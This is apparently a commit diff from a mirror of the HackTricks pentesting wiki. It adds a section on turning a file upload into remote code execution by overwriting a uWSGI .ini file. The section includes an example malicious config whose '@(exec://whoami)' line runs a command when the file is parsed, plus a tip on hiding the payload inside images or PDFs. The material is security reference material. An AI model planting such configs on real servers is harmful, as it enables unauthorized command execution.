mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
file upload to RCE using uwsgi.ini
This commit is contained in:
parent
e247c7fdc3
commit
f38b063a3d
1 changed files with 28 additions and 0 deletions
|
@ -119,6 +119,33 @@ If you can upload a XML file into a Jetty server you can obtain [RCE because **n
|
|||
|
||||
![](<../../.gitbook/assets/image (1) (3) (1).png>)
|
||||
|
||||
## **uWSGI RCE**
|
||||
|
||||
If you can replace the `.ini` configuration file of a [**uWSGI server you can obtain RCE**](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)**.** Indeed uWSGI configuration files can include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:
|
||||
|
||||
Example of malicious `uwsgi.ini` file:
|
||||
|
||||
```ini
|
||||
[uwsgi]
|
||||
; read from a symbol
|
||||
foo = @(sym://uwsgi_funny_function)
|
||||
; read from binary appended data
|
||||
bar = @(data://[REDACTED])
|
||||
; read from http
|
||||
test = @(http://[REDACTED])
|
||||
; read from a file descriptor
|
||||
content = @(fd://[REDACTED])
|
||||
; read from a process stdout
|
||||
body = @(exec://whoami)
|
||||
; call a function returning a char *
|
||||
characters = @(call://uwsgi_func)
|
||||
```
|
||||
|
||||
When the configuration file will be parsed(e.g. restart, crash or autoreload) payload will be executed.
|
||||
|
||||
**Important Note:** The uWSGI parsing of configuration file is lax. The previous payload can be embedded inside a binary file(e.g. image, pdf, ...).
|
||||
|
||||
|
||||
## **wget File Upload/SSRF Trick**
|
||||
|
||||
In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**\
|
||||
|
@ -154,6 +181,7 @@ Note that **another option** you may be thinking of to bypass this check is to m
|
|||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files)
|
||||
* [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
|
||||
* [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider)
|
||||
* [https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
|
||||
|
||||
## From File upload to other vulnerabilities
|
||||
|
||||
|
|
Loading…
Reference in a new issue